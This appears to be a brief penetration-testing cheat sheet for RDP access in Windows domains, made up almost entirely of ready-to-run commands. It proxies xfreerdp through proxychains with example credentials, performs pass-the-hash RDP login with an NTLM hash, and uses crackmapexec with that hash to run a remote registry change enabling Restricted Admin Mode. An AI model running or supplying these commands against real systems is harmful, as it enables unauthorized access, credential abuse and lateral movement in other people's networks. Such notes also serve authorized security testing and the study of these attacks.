RDP protocol

Proxy RDP protocol using xfreerdp

proxychains xfreerdp /v:192.168.0.10 /u:jdoe /p:Pass123 /d:corp.company.local /dynamic-resolution +clipboard

Proxy RDP protocol using xfreerdp and use NTLM hash to authenticate (PTH RDP)

  • System need to have Restricted Admin Mode enabled.
  • If not enable you will get an error : “Account Restrictions are preventing this user from signing in.
  • Restricted Admin Mode is disabled by default.
proxychains xfreerdp /v:192.168.0.10 /u:Administrator /pth:8846F7EAEE8FB117AD06BDD830B7586C

Enable Restricted Admin Mode (need admin priv)

crackmapexec smb 192.168.0.10 -u Administrator -H 8846F7EAEE8FB117AD06BDD830B7586C -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'